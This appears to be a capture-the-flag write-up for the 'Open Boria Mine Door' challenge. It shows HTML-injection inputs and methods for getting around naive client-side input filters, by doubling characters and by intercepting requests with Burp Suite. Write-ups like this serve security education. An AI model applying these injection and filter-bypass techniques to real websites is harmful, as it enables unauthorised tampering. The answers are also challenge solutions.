Open Boria Mine Door
Difficulty:
Shown in Report
Hal Tandybuck is trying to open that door and asking you for help.
Objective Image
Back
Challenge

Open the door to the Boria Mines. Help Alabaster Snowball in the Web Ring to get some hints for this challenge.

Open_Boria_Mine_Door_1.png

Open_Boria_Mine_Door_2.png

Solution

Let's just right-click -> show frame source on the lock window to find out the destination: https://hhc22-novel.kringlecon.com. The interesting parts here are:

...
        <div class="iframes">
            <iframe src='/pin1' class='pin1'></iframe>
            <iframe src='/pin2' class='pin2'></iframe>
            <iframe src='/pin3' class='pin3'></iframe>
            <iframe src='/pin6' class='pin6'></iframe>
            <iframe src='/pin5' class='pin5'></iframe>
            <iframe src='/pin4' class='pin4'></iframe>
...
    <script src="conduit.js"></script>
    <script src="app.js"></script>
...

Pin1

Let's look at the source for Pin1:

   <form method='post' action='pin1'>
        <!-- @&@&&W&&W&&&& -->
        <input class='inputTxt' name='inputTxt' type='text' value='' autocomplete='off' />
        <button>GO</button>

Why not just try that string mentioned in the comments? Indeed it's unlocking the first Pin.

Pin2

Let's look at the source for Pin2:

    <form method='post' action='pin2'>
        <!-- TODO: FILTER OUT HTML FROM USER INPUT -->
        <input class='inputTxt' name='inputTxt' type='text' value='' autocomplete='off' />
        <button>GO</button>

As we want to connect dots on different levels, let's try to use HTML <br> mixed with Uniface characters to draw the lines:

█──╮─────────
───╰──╮──────
──────╰─────█
resulting in 
<br>█──╮─────────<br>───╰──╮──────<br>──────╰─────█

Pin3

Let's look at the source for Pin3:

    <form method='post' action='pin3'>
        <!-- TODO: FILTER OUT JAVASCRIPT FROM USER INPUT -->
        <input class='inputTxt' name='inputTxt' type='text' value='' autocomplete='off' />
        <button>GO</button>

Guess the same technique should be working here as well. At the first try I didn't work, seems the color code must match here as well, so let's include this information as well:

──────╭─────█
──╭───╯──────
█─╯──────────
resulting in 
<font color="blue">──────╭─────█<br>──╭───╯──────<br>█─╯──────────</font>

The first three pins were open to unlock the gate.

We get following hints:

Significant CASE

Early parts of this challenge can be solved by focusing on Glamtariel's WORDS.

Another hint should be available if the remaining locks are also solved, so let's carry on.

Pin4

Let's look for the source of Pin4:

...
    <script>
        const sanitizeInput = () => {
            const input = document.querySelector('.inputTxt');
            const content = input.value;
            input.value = content
                .replace(/"/, '')
                .replace(/'/, '')
                .replace(/</, '')
                .replace(/>/, '');
        }
    </script>
...
    <form method='post' action='pin4'>
        <input class='inputTxt' name='inputTxt' type='text' value='' autocomplete='off' onblur='sanitizeInput()' />
        <button>GO</button>
    </form>

This time we have a slightly different pattern. In addition there is a sanitization implemented. As the whole string gets sanitized only for the first occurence of the shown characters we can just "duplicate" them.

o
█───────────█
█───────────█
█───────────█
resulting in 
o █───────────█ █───────────█ <<font color=""blue">>█───────────█</font>

Pin5

Let's look for the source of Pin5:

...
    <meta http-equiv="Content-Security-Policy" content="script-src 'self' 'unsafe-inline'; style-src 'self'">
...
    <script>
        const sanitizeInput = () => {
            const input = document.querySelector('.inputTxt');
            const content = input.value;
            input.value = content
                .replace(/"/gi, '')
                .replace(/'/gi, '')
                .replace(/</gi, '')
                .replace(/>/gi, '');
        }
    </script>
...
    <form method='post' action='pin5'>
        <input class='inputTxt' name='inputTxt' type='text' value='' autocomplete='off' onblur='sanitizeInput()' />
        <button>GO</button>

Okay, this time the sanitization catches all occurences. Maybe it's easier to "tweak" the client-side code. We'll open Burp Suite and use the built-in proxy. Just submit any character in the text field while intercept is on, select Action -> Do intercept -> Response to this request.
Afterwards we'll submit:

o
█─╭─────────█
█╭╯────╭────█
█╯╭────╯───█
█─│
resulting in
o <font color="red">█─╭─────────█</font> <font color="red">█╭╯──</font><font color="blue">──╭────█</font> <font color="red">█╯</font><font color="blue">╭────╯───█ █─│</font>

Pin6

Let's look for the source of Pin6:

...
    <meta http-equiv="Content-Security-Policy" content="script-src 'self'; style-src 'self'">
...
    <form method='post' action='pin6'>
        <input class='inputTxt' name='inputTxt' type='text' value='' autocomplete='off' />
        <button>GO</button>
    </form>

No sanitization in place? Ok let's just submit a proper pattern :-)

█───────────█
█─────────╮─█
█─╮───────╰─█
█─╰──────╮──█
█────────┃
resulting in 
<font color="lime">█───────────█</font> <font color="red">█─────────╮─█</font> <font color="blue">█─╮───────</font><font color="red">╰─█</font> <font color="blue">█─╰──────╮──█ █────────┃</font>

The final solution looks like this:

2022_Open_Moria_Mine_Door.png

We get following hints:

eXternal Entities

Sometimes we can hit web pages with XXE when they aren't expecting it!